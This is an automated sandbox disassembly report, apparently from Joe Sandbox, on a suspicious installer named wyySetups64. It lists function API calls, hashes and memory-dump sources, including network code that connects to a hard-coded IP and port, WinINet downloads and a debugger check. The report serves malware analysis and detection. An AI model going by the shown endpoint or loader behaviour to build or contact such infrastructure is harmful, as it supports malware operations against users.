                                                                                                                                                                                                              Function 00D51A37 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00D51A74
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 00D51A9A
                                                                                                                                                                                                              • SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 00D51ACE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 00D51B20
                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00D51B2B
                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 00D51B44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4292518056-3916222277
                                                                                                                                                                                                              • Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                              • Instruction ID: dbb316fb4a1dfce28b6668ab646ab268b8e442b421cf2bad86b7ec4cd03e05b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB3128B4640218FFEB10DF94CC89FAA7BB5EB48701F20C148FA09AB291D7B0D954CB65
                                                                                                                                                                                                              Function 1001124D Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 10011325
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 10011348
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                              • Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45
                                                                                                                                                                                                              Function 00D5EE57 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,00D51D65), ref: 00D5EE95
                                                                                                                                                                                                              • RpcBindingFromStringBindingW.RPCRT4(00D51D65,00000000), ref: 00D5EEB0
                                                                                                                                                                                                              • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 00D5EEE7
                                                                                                                                                                                                              • RpcStringFreeW.RPCRT4(00D51D65), ref: 00D5EEF1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1126441048-0
                                                                                                                                                                                                              • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction ID: e44938561fc96a1daae998fb56d2d3551bda6c576957c9aa4a3a0e4e067412cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2911DAB5D00219BFEB14CFE4C985BEEBBB4FB08704F108559E605B7280D7B59A54CBA0
                                                                                                                                                                                                              Function 100113E9 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1001140A
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 10011413
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 10011420
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                                                              Function 00D61520 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D61526
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6152F
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00D6153A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00D61541
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              • Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                              • Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11
                                                                                                                                                                                                              Function 00D61521 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D61526
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6152F
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00D6153A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00D61541
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              • Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                              • Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51
                                                                                                                                                                                                              Function 00D60EE7 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D60EFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                              • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction ID: 9b2d5830297149f68661b34005b9ab08a4c921503e6427eb5770f98a54a419f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17A14C75A11715CBEB1ACF55C8C179ABBB1FB48365F18C52AE429E72A0D334D940CF60
                                                                                                                                                                                                              Function 10010F10 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                              • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90
                                                                                                                                                                                                              Function 00D51087 Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 00D51135
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                                                                              • Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                              • Instruction ID: 5c49a896657d9d5056e40f461b09cf7d74cddba61ae46fb975a2a7b8595ddc58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C21EA78A44709AFEF14CF94CC86FAD7775AB48702F108059FA166A2D0C6B09944CB61
                                                                                                                                                                                                              Function 00D50AE4 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                              • Instruction ID: e3e4ffe5d5777b626c31e0dcde191156e3d8de247271d6b7342cd66842c622be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2317A76A087468FCB14DF18C4C0826BBE4FF89319F1A096DEC9597312E770F9598BA1
                                                                                                                                                                                                              Function 100100C0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 100100E3
                                                                                                                                                                                                              • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 10010139
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 10010182
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 10010196
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                                                                                                              • String ID: 118.107.44.219$18852
                                                                                                                                                                                                              • API String ID: 2357443324-3001398927
                                                                                                                                                                                                              • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65
                                                                                                                                                                                                              Function 1000CDE0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
                                                                                                                                                                                                              • ?flags@ios_base@std@@QBEHXZ.MSVCP140(0Gl), ref: 1000CEE5
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
                                                                                                                                                                                                              • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
                                                                                                                                                                                                              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000F2B3,?,?), ref: 1000CFB4
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
                                                                                                                                                                                                              • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
                                                                                                                                                                                                              • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
                                                                                                                                                                                                              • String ID: 0Gl$0Gl
                                                                                                                                                                                                              • API String ID: 4125389999-964914055
                                                                                                                                                                                                              • Opcode ID: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                                                              • Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90
                                                                                                                                                                                                              Function 00D60097 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00D600BA
                                                                                                                                                                                                              • getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 00D60101
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 00D60110
                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 00D60159
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 00D6016D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2560534018-0
                                                                                                                                                                                                              • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction ID: 0e3ab589b0ba76d469b4a7bb864190b3172f5b3d61201563e7ec9d532e8d1605
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E361F6B0945225EFEB04DFA8CDC8B9E7BB4FB0C311F108299E509A72A0C734D940DB65
                                                                                                                                                                                                              Function 00D51B87 Relevance: 15.1, APIs: 10, Instructions: 143networkwindowfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 00D51BA1
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 00D51BBD
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 00D51C04
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D51C21
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00001000,?), ref: 00D51C3C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00D51CF2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00D51D0F
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00D51D19
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00D51D23
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00D51D32
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2293700532-0
                                                                                                                                                                                                              • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                              • Instruction ID: 75be2450914abc55f55bfa557e669d05833de7a14dff8319154afc41bb92b828
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17513BB5D40218BBEB00DFA4CC85BEEB774FF49701F148608FA05BA190D775AA90CB60
                                                                                                                                                                                                              Function 00D51807 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153windowregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00D51829
                                                                                                                                                                                                                • Part of subcall function 00D515D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 00D51632
                                                                                                                                                                                                                • Part of subcall function 00D515D7: CoTaskMemFree.COMBASE(00000000), ref: 00D51685
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00D51984
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00D519BF
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00D519CE
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D519F5
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00D51A03
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00D51A0D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
